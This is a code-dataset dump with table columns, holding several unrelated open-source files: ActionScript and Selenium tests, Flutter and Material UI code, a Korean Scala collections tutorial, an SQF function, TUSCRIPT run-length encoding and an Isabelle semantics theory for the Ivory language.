content stringlengths 4 1.04M | lang stringclasses 358
values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
package {
public class Test {
}
}
var a = new Array("a", "b", "c");
trace("//delete a[1]");
trace(delete a[1]);
trace("//Array 0 thru 3...");
trace(a[0]);
trace(a[1]);
trace(a[2]);
trace(a[3]);
trace("//array.length");
trace(a.length);
trace("//array.hasOwnProperty(1)");
trace(a.hasOwnProperty(1));
trace("//delete a[2]");
trace(delete a[2]);
trace("//Array 0 thru 3...");
trace(a[0]);
trace(a[1]);
trace(a[2]);
trace(a[3]);
trace("//array.length");
trace(a.length);
trace("//array.hasOwnProperty(2)");
trace(a.hasOwnProperty(2));
trace("//delete a[3]");
trace(delete a[3]);
trace("//Array 0 thru 3...");
trace(a[0]);
trace(a[1]);
trace(a[2]);
trace(a[3]);
trace("//array.length");
trace(a.length);
trace("//array.hasOwnProperty(3)");
trace(a.hasOwnProperty(3));
trace("//delete a[4]");
trace(delete a[4]);
trace("//Array 0 thru 3...");
trace(a[0]);
trace(a[1]);
trace(a[2]);
trace(a[3]);
trace("//array.length");
trace(a.length);
trace("//array.hasOwnProperty(4)");
trace(a.hasOwnProperty(4)); | ActionScript | 3 | Sprak1/ruffle | tests/tests/swfs/avm2/array_delete/Test.as | [
"Apache-2.0",
"Unlicense"
] |
<template name="CodeMirror">
<textarea id="{{editorId}}" name="{{editorName}}" style="display: none">{{code}}</textarea>
</template>
| HTML | 2 | subramanir2143/Rocket.Chat | app/ui/client/lib/codeMirror/codeMirrorComponent.html | [
"MIT"
] |
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!--
Copyright 2011 Software Freedom Conservancy
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="content-type">
<title>Test Click Javascript Href Chrome</title>
</head>
<body>
<table cellpadding="1" cellspacing="1" border="1">
<tbody>
<tr>
<td rowspan="1" colspan="3">TestClickJavaScriptHref<br>
</td>
</tr>
<tr>
<td>open</td>
<td>../tests/html/test_click_javascript_chrome_page.html</td>
<td> </td>
</tr>
</tbody>
</table>
<p>Click a regular javascript href</p>
<table cellpadding="1" cellspacing="1" border="1">
<tbody>
<tr>
<td>click</td>
<td>id=a</td>
<td></td>
</tr>
<tr>
<td>verifyAlert</td>
<td>exact:a</td>
<td></td>
</tr>
</tbody>
</table>
<p>Click a javascript href with leading whitespace</p>
<table cellpadding="1" cellspacing="1" border="1">
<tbody>
<tr>
<td>click</td>
<td>id=b</td>
<td></td>
</tr>
<tr>
<td>verifyAlert</td>
<td>exact:b</td>
<td></td>
</tr>
</tbody>
</table>
<p>Click a javascript href with mixed cases</p>
<table cellpadding="1" cellspacing="1" border="1">
<tbody>
<tr>
<td>click</td>
<td>id=c</td>
<td></td>
</tr>
<tr>
<td>verifyAlert</td>
<td>exact:c</td>
<td/>
</tr>
</tbody>
</table>
<p>Click a javascript href that removes itself</p>
<table cellpadding="1" cellspacing="1" border="1">
<tbody>
<tr>
<td>click</td>
<td>id=d</td>
<td></td>
</tr>
<tr>
<td>verifyElementNotPresent</td>
<td>id=d</td>
<td></td>
</tr>
</tbody>
</table>
<p>Click a javascript href that removes itself and then raises an alert</p>
<table cellpadding="1" cellspacing="1" border="1">
<tbody>
<tr>
<td>click</td>
<td>id=e</td>
<td></td>
</tr>
<tr>
<td>verifyAlert</td>
<td>exact:e</td>
<td></td>
</tr>
<tr>
<td>verifyElementNotPresent</td>
<td>id=e</td>
<td></td>
</tr>
</tbody>
</table>
<p>Click a javascript href that opens a window</p>
<table cellpadding="1" cellspacing="1" border="1">
<tbody>
<tr>
<td>click</td>
<td>id=f</td>
<td></td>
</tr>
<tr>
<td>waitForPopUp</td>
<td>f-window</td>
<td>10000</td>
</tr>
<tr>
<td>selectWindow</td>
<td>name=f-window</td>
<td></td>
</tr>
<tr>
<td>verifyElementPresent</td>
<td>id=visibleParagraph</td>
<td></td>
</tr>
<tr>
<td>close</td>
<td></td>
<td></td>
</tr>
<tr>
<td>selectWindow</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<p>Click a javascript href that opens a window and then raises an alert</p>
<table cellpadding="1" cellspacing="1" border="1">
<tbody>
<tr>
<td>click</td>
<td>id=g</td>
<td></td>
</tr>
<tr>
<td>verifyAlert</td>
<td>exact:g</td>
<td></td>
</tr>
<tr>
<td>waitForPopUp</td>
<td>g-window</td>
<td>10000</td>
</tr>
<tr>
<td>selectWindow</td>
<td>name=g-window</td>
<td></td>
</tr>
<tr>
<td>verifyElementPresent</td>
<td>id=visibleParagraph</td>
<td></td>
</tr>
<tr>
<td>close</td>
<td></td>
<td></td>
</tr>
<tr>
<td>selectWindow</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<p>Click a javascript href that raises an alert, then navigates to a new URL</p>
<table cellpadding="1" cellspacing="1" border="1">
<tbody>
<tr>
<td>clickAndWait</td>
<td>id=h</td>
<td></td>
</tr>
<tr>
<td>verifyAlert</td>
<td>exact:h</td>
<td></td>
</tr>
<tr>
<td>verifyElementPresent</td>
<td>id=visibleParagraph</td>
<td></td>
</tr>
</tbody>
</table>
</body>
</html>
| HTML | 3 | weilandia/selenium | common/src/web/rc/tests/TestClickJavascriptHrefChrome.html | [
"Apache-2.0"
] |
// Copyright 2014 The Flutter Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
import 'package:meta/meta.dart';
/// An object sent from the Flutter Driver to a Flutter application to instruct
/// the application to perform a task.
abstract class Command {
/// Abstract const constructor. This constructor enables subclasses to provide
/// const constructors so that they can be used in const expressions.
const Command({ this.timeout });
/// Deserializes this command from the value generated by [serialize].
Command.deserialize(Map<String, String> json)
: timeout = _parseTimeout(json);
static Duration? _parseTimeout(Map<String, String> json) {
final String? timeout = json['timeout'];
if (timeout == null)
return null;
return Duration(milliseconds: int.parse(timeout));
}
/// The maximum amount of time to wait for the command to complete.
///
/// Defaults to no timeout, because it is common for operations to take oddly
/// long in test environments (e.g. because the test host is overloaded), and
/// having timeouts essentially means having race conditions.
final Duration? timeout;
/// Identifies the type of the command object and of the handler.
String get kind;
/// Whether this command requires the widget tree to be initialized before
/// the command may be run.
///
/// This defaults to true to force the application under test to call [runApp]
/// before attempting to remotely drive the application. Subclasses may
/// override this to return false if they allow invocation before the
/// application has started.
///
/// See also:
///
/// * [WidgetsBinding.isRootWidgetAttached], which indicates whether the
/// widget tree has been initialized.
bool get requiresRootWidgetAttached => true;
/// Serializes this command to parameter name/value pairs.
@mustCallSuper
Map<String, String> serialize() {
final Map<String, String> result = <String, String>{
'command': kind,
};
if (timeout != null)
result['timeout'] = '${timeout!.inMilliseconds}';
return result;
}
}
/// An object sent from a Flutter application back to the Flutter Driver in
/// response to a command.
abstract class Result {
/// A const constructor to allow subclasses to be const.
const Result();
/// An empty responds that does not include any result data.
///
/// Consider using this object as a result for [Command]s that do not return
/// any data.
static const Result empty = _EmptyResult();
/// Serializes this message to a JSON map.
Map<String, dynamic> toJson();
}
class _EmptyResult extends Result {
const _EmptyResult();
@override
Map<String, dynamic> toJson() => <String, dynamic>{};
}
| Dart | 5 | Mayb3Nots/flutter | packages/flutter_driver/lib/src/common/message.dart | [
"BSD-3-Clause"
] |
"use strict";
var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault");
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.default = void 0;
var _createSvgIcon = _interopRequireDefault(require("./utils/createSvgIcon"));
var _jsxRuntime = require("react/jsx-runtime");
var _default = (0, _createSvgIcon.default)( /*#__PURE__*/(0, _jsxRuntime.jsx)("path", {
d: "M19.88 18.47c.48-.77.75-1.67.69-2.66-.13-2.15-1.84-3.97-3.97-4.2-2.72-.3-5.02 1.81-5.02 4.47 0 2.49 2.01 4.5 4.49 4.5.88 0 1.7-.26 2.39-.7l2.41 2.41c.39.39 1.03.39 1.42 0 .39-.39.39-1.03 0-1.42l-2.41-2.4zm-3.8.11c-1.38 0-2.5-1.12-2.5-2.5s1.12-2.5 2.5-2.5 2.5 1.12 2.5 2.5-1.12 2.5-2.5 2.5zm-.36-8.5c-.74.02-1.45.18-2.1.45l-.55-.83-3.08 5.01c-.36.58-1.17.64-1.61.13l-2.12-2.47-3.06 4.9c-.31.49-.97.62-1.44.28-.42-.31-.54-.89-.26-1.34l3.78-6.05c.36-.57 1.17-.63 1.61-.12L9 12.5l3.18-5.17c.38-.62 1.28-.64 1.68-.03l1.86 2.78zm2.59.5c-.64-.28-1.33-.45-2.05-.49L20.8 2.9c.31-.49.97-.61 1.43-.27.43.31.54.9.26 1.34l-4.18 6.61z"
}), 'QueryStatsRounded');
exports.default = _default; | JavaScript | 3 | good-gym/material-ui | packages/material-ui-icons/lib/QueryStatsRounded.js | [
"MIT"
] |
ByJZ | PureBasic | 0 | pchandrasekaran1595/onnx | onnx/backend/test/data/node/test_xor_bcast4v4d/test_data_set_0/input_1.pb | [
"Apache-2.0"
] |
---
prev: sbt.textile
next: specs.textile
title: 컬렉션(계속)
layout: post
---
스칼라에는 멋진 컬렉션이 여럿 구현되어 있다. 이를 활용해 <code>Foo</code>를 모아둔 컬렉션이 <code>리스트(List)</code>, <code>집합(Set)</code>, 또는 다른 어떤 것이든 상관 없이 잘 동작하는 코드를 만들 수 있다.
"이 페이지는":https://www.decodified.com/scala/collections-api.xml 스칼라가 제공하는 기본 구현의 구조를 잘 보여주며, 각 클래스의 스칼라 문서에 대한 링크도 제공한다.
* "기초":#basics 항상 사용하게 될 컬렉션들
* "계층 구조":#hierarchy 컬렉션 추상화 계층
* "메소드":#methods
* "변경불가능한 컬렉션":#mutable
* "자바 컬렉션":#java 도 사용 가능함
h2(#basics). 기초
h3. 리스트
표준적인 연결 리스트이다.
<pre>
scala> List(1, 2, 3)
res0: List[Int] = List(1, 2, 3)
</pre>
다른 함수언어와 마찬가지로 cons(역주: LISP에서 내려온 전통적인 이름으로 두 셀을 하나로 묶어 구성(construction)해 주기 때문에 cons라 부른다. LISP에서는 cons를 사용해 리스트 뿐 아니라 트리 등 여러 데이터구조를 만들고 활용한다. Haskell등 더 정형화된 함수언어로 오면서 LISP의 cons cell이 가지는 일반성은 없어졌지만, :나 ::등의 연산자를 부르는 이름으로 여전히 사용되곤 한다)로 구성이 가능하다.
<pre>
scala> 1 :: 2 :: 3 :: Nil
res1: List[Int] = List(1, 2, 3)
</pre>
*See also* "리스트 API":https://www.scala-lang.org/api/current/scala/collection/immutable/List.html
h3. 집합
중복을 허용하지 않는다.
<pre>
scala> Set(1, 1, 2)
res2: scala.collection.immutable.Set[Int] = Set(1, 2)
</pre>
*See also* "집합 API":https://www.scala-lang.org/api/current/scala/collection/immutable/Set.html
h3. 순서열(Seq)
순서열은 순서가 있다.
<pre>
scala> Seq(1, 1, 2)
res3: Seq[Int] = List(1, 1, 2)
</pre>
(반환된 것이 리스트임에 유의하라. <code>Seq</code>는 트레잇이다. 리스트는 Seq를 잘 구현하고 있다. 여기서 볼 수 있듯 <code>Seq</code>라 불리는 팩토리 객체가 있어서 리스트를 만들어준다.)
*See also* "순서열 API":https://www.scala-lang.org/api/current/scala/collection/Seq.html
h3. 맵(Map)
맵은 키-값 쌍을 저장한다.
<pre>
scala> Map('a' -> 1, 'b' -> 2)
res4: scala.collection.immutable.Map[Char,Int] = Map((a,1), (b,2))
</pre>
*See also* "맵 API":https://www.scala-lang.org/api/current/scala/collection/immutable/Map.html
h2(#hierarchy). 계층 구조
다음은 모든 트레잇이다. mutable과 immutable 패키지에는 이 트레잇에 대한 각각의 구현이 들어있다.
h3. 방문가능(Traversable)
모든 컬렉션은 방문 가능해야 한다. 이 트레잇는 표준적인 함수 콤비네이터를 정의한다. 이런 콤비네이터는 @foreach@를 기초로 구현되어 있다. @foreach@는 모든 컬렉션이 구현해야만 하는 메소드이다.
*See Also* "방문가능 API":#https://www.scala-lang.org/api/current/scala/collection/Traversable.html
h3. 반복가능(Iterable)
원소에 대해 루프를 돌 수 있는 반복자를 반환하는 @iterator()@ 메소드를 반환한다.
*See Also* "반복가능 API":https://www.scala-lang.org/api/current/scala/collection/Iterable.html
h3. 순서열(Seq)
순서가 있는 아이템 열이다.
*See Also* "순서열 API":https://www.scala-lang.org/api/current/scala/collection/Seq.html
h3. 집합(Set)
원소의 중복이 없는 컬렉션이다.
*See Also* "집합 API":https://www.scala-lang.org/api/current/scala/collection/immutable/Set.html
h3. 맵(Map)
키-값 쌍을 보관하는 컬렉션이다.
*See Also* "맵 API":https://www.scala-lang.org/api/current/scala/collection/immutable/Map.html
h2(#methods). 메소드
h3. 방문가능(Traversable)
아래 메소드들은 모두 사용 가능하다. 하위 클래스에서 오버라이드가 가능하기 때문에, 인자와 반환 값의 타입이 아래 명시된 것과 동일하지 않을 수도 있다.
<pre>
def head : A
def tail : Traversable[A]
</pre>
다음에 정의된 모든 함수 콤비네이터를 보인다.
<code>
def map [B] (f: (A) => B) : CC[B]
</code>
모든 원소가 @f@로 변환된 결과 컬렉션을 반환한다
<code>
def foreach[U](f: Elem => U): Unit
</code>
컬렉션의 모든 원소에 @f@를 적용해 컬렉션을 변환한다. (역주: 즉, f의 부작용-side effect-을 활용한다)
<code>
def find (p: (A) => Boolean) : Option[A]
</code>
술어 함수 p를 만족하는 가장 첫 원소를 반환한다.
<code>
def filter (p: (A) => Boolean) : Traversable[A]
</code>
술어함수를 만족하는 모든 원소로 이루어진 컬렉션을 반환한다.
분할하기:
<code>
def partition (p: (A) ⇒ Boolean) : (Traversable[A], Traversable[A])
</code>
컬렉션을 술어함수에 따라 서로소인 두 컬렉션으로 나눈다.
<code>
def groupBy [K] (f: (A) => K) : Map[K, Traversable[A]]
</code>
f의 반환값에 따라 컬렉션을 분할해서 맵에 넣어준다.
변환:
재미있게도 한 컬렉션을 다른 컬렉션으로 상호 변환 가능하다.
<pre>
def toArray : Array[A]
def toArray [B >: A] (implicit arg0: ClassManifest[B]) : Array[B]
def toBuffer [B >: A] : Buffer[B]
def toIndexedSeq [B >: A] : IndexedSeq[B]
def toIterable : Iterable[A]
def toIterator : Iterator[A]
def toList : List[A]
def toMap [T, U] (implicit ev: <:<[A, (T, U)]) : Map[T, U]
def toSeq : Seq[A]
def toSet [B >: A] : Set[B]
def toStream : Stream[A]
def toString () : String
def toTraversable : Traversable[A]
</pre>
맵을 배열로 변환하면, 키-값 쌍(튜플)의 배열을 얻는다.
<pre>
scala> Map(1 -> 2).toArray
res41: Array[(Int, Int)] = Array((1,2))
</pre>
h3. 반복가능(Iterable)
반복자를 사용하도록 해준다.
<pre>
def iterator: Iterator[A]
</pre>
반복자 Iterator가 제공하는 기능은?
<pre>
def hasNext(): Boolean
def next(): A
</pre>
아주 자바스럽다. 스칼라에서 반복자를 사용할 일은 많지 않다. 함수 콤비네이터나 for-컴프리핸션(for-comprehension)을 더 많이 쓰게 될 것이다.
h3. 집합
<pre>
def contains(key: A): Boolean
def +(elem: A): Set[A]
def -(elem: A): Set[A]
</pre>
h3. 맵
키-값의 열로, 키를 가지고 검색이 가능하다.
아래와 같이 튜플의 리스트를 apply()에 넘기거나,
<pre>
scala> Map("a" -> 1, "b" -> 2)
res0: scala.collection.immutable.Map[java.lang.String,Int] = Map((a,1), (b,2))
</pre>
아래와 같이 넘기면 맵이 생성된다.
<pre>
scala> Map(("a", 2), ("b", 2))
res0: scala.collection.immutable.Map[java.lang.String,Int] = Map((a,2), (b,2))
</pre>
h6. 곁가지
<code>-></code>는 무엇일까? 이는 특별한 문법이 아니다. 단지 튜플을 반환하는 메소드일 뿐이다.
<pre>
scala> "a" -> 2
res0: (java.lang.String, Int) = (a,2)
</pre>
기억할지 모르겠지만, 이는 단지 아래 식을 쓰기 편하게 한 것일 뿐이다.
<pre>
scala> "a".->(2)
res1: (java.lang.String, Int) = (a,2)
</pre>
또한 <code>++</code>를 사용해 맵을 구축할 수도 있다.
<pre>
scala> Map.empty ++ List(("a", 1), ("b", 2), ("c", 3))
res0: scala.collection.immutable.Map[java.lang.String,Int] = Map((a,1), (b,2), (c,3))
</pre>
h3. 자주 사용하게 될 하위 클래스들
*해시집합(HashSet)과 해시맵(HashMap)* 빠른 검색이 가능하며, 컬렉션 중 가장 자주 사용하게될 것이다.
"해시집합 API":https://www.scala-lang.org/api/current/scala/collection/immutable/HashSet.html, "해시맵 API":https://www.scala-lang.org/api/current/scala/collection/immutable/HashMap.html
*트리맵(TreeMap)* 정렬된 맵(SortedMap)의 하위클래스로, 맵이면서 순서를 보존해준다. "트리맵 API":https://www.scala-lang.org/api/current/scala/collection/immutable/TreeMap.html
*벡터(Vector)* 빠른 임의 위치 읽기와 변경을 보장해준다. "벡터 API":https://www.scala-lang.org/api/current/scala/collection/immutable/Vector.html
<pre>
scala> IndexedSeq(1, 2, 3)
res0: IndexedSeq[Int] = Vector(1, 2, 3)
</pre>
*범위(Range)* 1 간격으로 된 정수 열이다. 자바에서 숫자를 세는 for 루프를 사용했던 경우 많이 쓰게될 것이다. "범위 API":https://www.scala-lang.org/api/current/scala/collection/immutable/Range.html
<pre>
scala> for (i <- 1 to 3) { println(i) }
1
2
3
</pre>
범위는 자체만의 표준 함수 콤비네이터를 제공한다.
<pre>
scala> (1 to 3).map { i => i }
res0: scala.collection.immutable.IndexedSeq[Int] = Vector(1, 2, 3)
</pre>
h3. 기본 구현
각 트레잇의 apply 메소드를 호출하면 기본 구현의 인스턴스를 만들 수 있다. 예를 들어 Iterable(1, 2)를 호출하면 Iterable의 기본 구현인 리스트가 반환된다.
<pre>
scala> Iterable(1, 2)
res0: Iterable[Int] = List(1, 2)
</pre>
앞에서 설명했지만 Seq도 마찬가지이다.
<pre>
scala> Seq(1, 2)
res3: Seq[Int] = List(1, 2)
scala> Iterable(1, 2)
res1: Iterable[Int] = List(1, 2)
scala> Sequence(1, 2)
warning: there were deprecation warnings; re-run with -deprecation for details
res2: Seq[Int] = List(1, 2)
</pre>
집합은 다음과 같다.
<pre>
scala> Set(1, 2)
res31: scala.collection.immutable.Set[Int] = Set(1, 2)
</pre>
h3. 다른 (이름이 특징을 설명해 주는) 트레잇들
*색인열(IndexedSeq)* 원소의 빠른 임의 억세스가 가능하고, 길이를 빠르게 계산한다. "색인열 API":https://www.scala-lang.org/api/current/scala/collection/IndexedSeq.html
*선형열(LinearSeq)* head를 사용해 빠르게 첫 원소를 억세스할 수 있고, tail 연산도 빨리 할 수 있다. "선형열 API":https://www.scala-lang.org/api/current/scala/collection/LinearSeq.html
h4. 변경가능한지 아닌지 여부에 따른 구분
불면성(immutable)
장점
* 다중 쓰레드의 경우에도 다른 클래스로 바꿀 필요가 없다.
단점
* 변경이 불가능하다.
스칼라는 실용적인 접근을 허용한다. 불변성을 장려하기는 하지만, 변경을 사용한다고 해서 문제가 될것은 없다. 이는 var와 val과도 유사하다. 보통 val로 프로그램을 짜기 시작 하지만, 필요한 경우 var를 활용해도 된다.
불변성 컬렉션으로 시작해서 성능 향상이 필요한 경우 변경 가능한쪽으로 바꿀 수 있다. 불변성 컬렉션을 사용하면 다중 쓰레드에서 실수로 이를 변경하는 경우를 막을 수 있다.
h2(#mutable). 변경가능(Mutable)
지금까지 다룬 모든 클래스는 불변성이었다. 이제 자주 사용되는 변경 가능한 컬렉션을 살펴보자.
*해시맵(HashMap)*은 @getOrElseUpdate@, @+=@ 등을 제공한다 "해시맵 API":https://www.scala-lang.org/api/current/scala/collection/mutable/HashMap.html
<pre>
scala> val numbers = collection.mutable.Map(1 -> 2)
numbers: scala.collection.mutable.Map[Int,Int] = Map((1,2))
scala> numbers.get(1)
res0: Option[Int] = Some(2)
scala> numbers.getOrElseUpdate(2, 3)
res54: Int = 3
scala> numbers
res55: scala.collection.mutable.Map[Int,Int] = Map((2,3), (1,2))
scala> numbers += (4 -> 1)
res56: numbers.type = Map((2,3), (4,1), (1,2))
</pre>
*리스트버퍼(ListBuffer)와 배열버퍼(ArrayBuffer)* @+=@를 제공함 "리스트버퍼 API":https://www.scala-lang.org/api/current/scala/collection/mutable/ListBuffer.html, "배열버퍼 API":https://www.scala-lang.org/api/current/scala/collection/mutable/ArrayBuffer.html
*연결리스트(LinkedList)와 이중연결리스트(DoubleLinkedList)* "연결리스트 API":https://www.scala-lang.org/api/current/scala/collection/mutable/LinkedList.html, "이중연결리스트 API":https://www.scala-lang.org/api/current/scala/collection/mutable/DoubleLinkedList.html
*우선순위 큐(PriorityQueue)* "우선순위 큐 API":https://www.scala-lang.org/api/current/scala/collection/mutable/PriorityQueue.html
*스택(Stack)과 배열스택(ArrayStack)* "스택 API":https://www.scala-lang.org/api/current/scala/collection/mutable/Stack.html, "배열스택 API":https://www.scala-lang.org/api/current/scala/collection/mutable/ArrayStack.html
*스트링빌더(StringBuilder)* 재미있는 것은 스트링빌더가 컬렉션이란 점이다. "스트링빌더 API":https://www.scala-lang.org/api/current/scala/collection/mutable/StringBuilder.html
h2(#java). 자바와 공존하기
자바와 스칼라 컬렉션을 쉽게 오갈 수 있다. 변환은 <a href="https://www.scala-lang.org/api/current/index.html#scala.collection.JavaConverters$">JavaConverters 패키지에</a> 정의되어 있다. 이를 통해 자주 사용하는 자바 컬렉션에는 <code>asScala</code> 메소드가, 스칼라 컬렉션에는 <code>asJava</code> 메소드가 추가된다.
<pre>
import scala.collection.JavaConverters._
val sl = new scala.collection.mutable.ListBuffer[Int]
val jl : java.util.List[Int] = sl.asJava
val sl2 : scala.collection.mutable.Buffer[Int] = jl.asScala
assert(sl eq sl2)
</pre>
상호 변환이 되는 것은 다음과 같다.
<pre>
scala.collection.Iterable <=> java.lang.Iterable
scala.collection.Iterable <=> java.util.Collection
scala.collection.Iterator <=> java.util.{ Iterator, Enumeration }
scala.collection.mutable.Buffer <=> java.util.List
scala.collection.mutable.Set <=> java.util.Set
scala.collection.mutable.Map <=> java.util.{ Map, Dictionary }
scala.collection.mutable.ConcurrentMap <=> java.util.concurrent.ConcurrentMap
</pre>
추가로 다음은 한쪽으로만 변환이 가능하다.
<pre>
scala.collection.Seq => java.util.List
scala.collection.mutable.Seq => java.util.List
scala.collection.Set => java.util.Set
scala.collection.Map => java.util.Map
</pre>
| Textile | 4 | AstronomiaDev/scala_school | web/ko/coll2.textile | [
"Apache-2.0"
] |
#include "script_component.hpp"
/*
Name: TFAR_fnc_currentDirection
Author: NKey, Dedmen
Returns current direction of Units head.
Arguments:
0: unit to get the Head direction from. <UNIT> (default: TFAR_currentUnit)
Return Value:
current look direction in Normalized 3D Vector <ARRAY>
Example:
TFAR_currentUnit call TFAR_fnc_currentDirection;
Public: Yes
*/
params [["_unit", TFAR_currentUnit, [objNull]]];
if (_unit getVariable ["TFAR_forceSpectator",false]) exitWith {(positionCameraToWorld [0,0,1]) vectorDiff (positionCameraToWorld [0,0,0])};
getCameraViewDirection _unit
| SQF | 4 | MrDj200/task-force-arma-3-radio | addons/core/functions/fnc_currentDirection.sqf | [
"RSA-MD"
] |
$$ MODE TUSCRIPT,{}
input="WWWWWWWWWWWWBWWWWWWWWWWWWBBBWWWWWWWWWWWWWWWWWWWWWWWWBWWWWWWWWWWWWWW",output=""
string=strings(input," ? ")
letter=ACCUMULATE(string,freq)
freq=SPLIT(freq),letter=SPLIT(letter)
output=JOIN(freq,"",letter)
output=JOIN(output,"")
PRINT input
PRINT output
| Turing | 3 | LaudateCorpus1/RosettaCodeData | Task/Run-length-encoding/TUSCRIPT/run-length-encoding.tu | [
"Info-ZIP"
] |
(* An abstract machine for the semantics of Ivory *)
(*<*)
theory Semantics
imports Syntax
begin
(*>*)
section {* Semantics *}
subsection {* Expressions *}
(* We use a natural semantics for the evaluation of expressions *)
fun
cmpopV :: "cmpop \<Rightarrow> nat \<Rightarrow> nat \<Rightarrow> bool"
where
"cmpopV lt e\<^sub>1 e\<^sub>2 = (e\<^sub>1 < e\<^sub>2)"
| "cmpopV eq e\<^sub>1 e\<^sub>2 = (e\<^sub>1 = e\<^sub>2)"
fun
binopV :: "binop \<Rightarrow> nat \<Rightarrow> nat \<Rightarrow> nat"
where
"binopV add e\<^sub>1 e\<^sub>2 = (e\<^sub>1 + e\<^sub>2)"
| "binopV sub e\<^sub>1 e\<^sub>2 = (e\<^sub>1 - e\<^sub>2)"
| "binopV mult e\<^sub>1 e\<^sub>2 = (e\<^sub>1 * e\<^sub>2)"
(* Expression evaluation is partial because not all variables are mapped by the environment *)
fun
ExpV :: "'var store \<Rightarrow> 'var expr \<Rightarrow> wvalue option"
where
ExpVar: "ExpV G (Var x) = G x"
| ExpNat: "ExpV G (Nat n) = Some (PrimV (NatV n))"
| ExpBool: "ExpV G (Bool b) = Some (PrimV (BoolV b))"
| ExpUnit: "ExpV G Unit = Some (PrimV UnitV)"
| ExpBinCmp: "ExpV G (BinCmp bop e\<^sub>1 e\<^sub>2) = (case (ExpV G e\<^sub>1, ExpV G e\<^sub>2) of
(Some (PrimV (NatV v\<^sub>1)), Some (PrimV (NatV v\<^sub>2))) \<Rightarrow> Some (PrimV (BoolV (cmpopV bop v\<^sub>1 v\<^sub>2)))
| _ \<Rightarrow> None)"
| ExpBinOp: "ExpV G (BinOp bop e\<^sub>1 e\<^sub>2) = (case (ExpV G e\<^sub>1, ExpV G e\<^sub>2) of
(Some (PrimV (NatV v\<^sub>1)), Some (PrimV (NatV v\<^sub>2))) \<Rightarrow> Some (PrimV (NatV (binopV bop v\<^sub>1 v\<^sub>2)))
| _ \<Rightarrow> None)"
abbreviation
expv_some :: "'var store \<Rightarrow> 'var expr \<Rightarrow> wvalue \<Rightarrow> bool" ("_ \<Turnstile> _ \<down> _")
where
"G \<Turnstile> e \<down> v \<equiv> ExpV G e = Some v"
fun
wvalue_to_hvalue :: "wvalue \<Rightarrow> hvalue option"
where
"wvalue_to_hvalue (PrimV v) = Some (StoredV v)"
| "wvalue_to_hvalue _ = None"
fun
hvalue_to_wvalue :: "hvalue \<Rightarrow> wvalue option"
where
"hvalue_to_wvalue (StoredV v) = Some (PrimV v)"
(* Impure expression evaluation is partial because both (pure) expression evaluation and some heap operations are. *)
fun
ImpureExpV :: "'var store \<Rightarrow> heap \<Rightarrow> 'var impureexp \<Rightarrow> (heap \<times> wvalue) option"
where
ExpPure: "ImpureExpV G H (Pure e) = Option.map (\<lambda>v. (H, v)) (ExpV G e)"
(* We just choose a p here, we can probably do better; at least this is deterministic wrt equality as opposed to SOME *)
| ExpNewRef: "ImpureExpV G H (NewRef e) = (let region = length H - 1 in
let off = fresh_in_heap H region in
Option.bind (ExpV G e)
(\<lambda>wv. Option.bind (wvalue_to_hvalue wv)
(\<lambda>v. Option.bind (update_heap H region off v)
(\<lambda>H'. Some (H', RefV region off)))))"
| ExpReadRef: "ImpureExpV G H (ReadRef e) = (case ExpV G e of Some (RefV region off) \<Rightarrow> Option.bind (lookup_heap H region off)
(\<lambda>hv. Option.bind (hvalue_to_wvalue hv)
(\<lambda>v. Some (H,v)))
| _ \<Rightarrow> None)"
| ExpWriteRef: "ImpureExpV G H (WriteRef e\<^sub>1 e\<^sub>2) = (case (ExpV G e\<^sub>1, ExpV G e\<^sub>2) of
(Some (RefV region off), Some wv) \<Rightarrow> Option.bind (wvalue_to_hvalue wv)
(\<lambda>v. Option.bind (update_heap H region off v)
(\<lambda>H'. Some (H', PrimV UnitV)))
| _ \<Rightarrow> None)"
abbreviation
impure_expv_some :: "'var store \<Rightarrow> heap \<Rightarrow> 'var impureexp \<Rightarrow> heap \<Rightarrow> wvalue \<Rightarrow> bool" ("_ \<Turnstile> _, _ \<Down> _, _" [49, 49, 49, 49, 49] 50)
where
"G \<Turnstile> H, e \<Down> H', v \<equiv> ImpureExpV G H e = Some (H', v)"
subsection {* Statement evaluation *}
(* The semantics may return either a Normal continuation, a Finished value --- the latter happens only
when a return occurs in an empty stack *)
datatype ('var, 'fun) StepResult = Normal "('var, 'fun) state \<times> ('var, 'fun) stmt" | Finished wvalue
(* The semantics of statements is modelled as an abstract machine,
including stack frames for function and sequence continuations. An
operational semantics is possible, but such a semantics make
preservation difficult to prove. In particular, the intaraction
between function calls, the store environment, and the sequence
typing rule (which has the same store environment for both
statements in the sequence).
*)
inductive
Step :: "('var, 'fun) funs \<Rightarrow> ('var, 'fun) state \<times> ('var, 'fun) stmt \<Rightarrow> ('var, 'fun) StepResult \<Rightarrow> bool" ("_ \<Turnstile> _ \<rhd> _" [49, 49, 49] 50)
where
StepBind: "\<lbrakk> store S \<Turnstile> heap S, e \<Down> H', v \<rbrakk> \<Longrightarrow> F \<Turnstile> (S, Bind x e s) \<rhd> Normal (S\<lparr> store := (store S)(x \<mapsto> v), heap := H' \<rparr>, s)"
| StepIf: "\<lbrakk> store S \<Turnstile> e \<down> PrimV (BoolV b) \<rbrakk> \<Longrightarrow> F \<Turnstile> (S, If e s\<^sub>1 s\<^sub>2) \<rhd> Normal (S, if b then s\<^sub>1 else s\<^sub>2)"
(* Note that we replace e\<^sub>I by e\<^sub>S in the unfolded loop. *)
| StepFor: "\<lbrakk> store S \<Turnstile> e\<^sub>I \<down> v \<rbrakk> \<Longrightarrow> F \<Turnstile> (S, For x e\<^sub>I e\<^sub>B e\<^sub>S s) \<rhd> Normal (S\<lparr> store := (store S)(x \<mapsto> v) \<rparr>, If e\<^sub>B (s ;; For x e\<^sub>S e\<^sub>B e\<^sub>S s) Skip)"
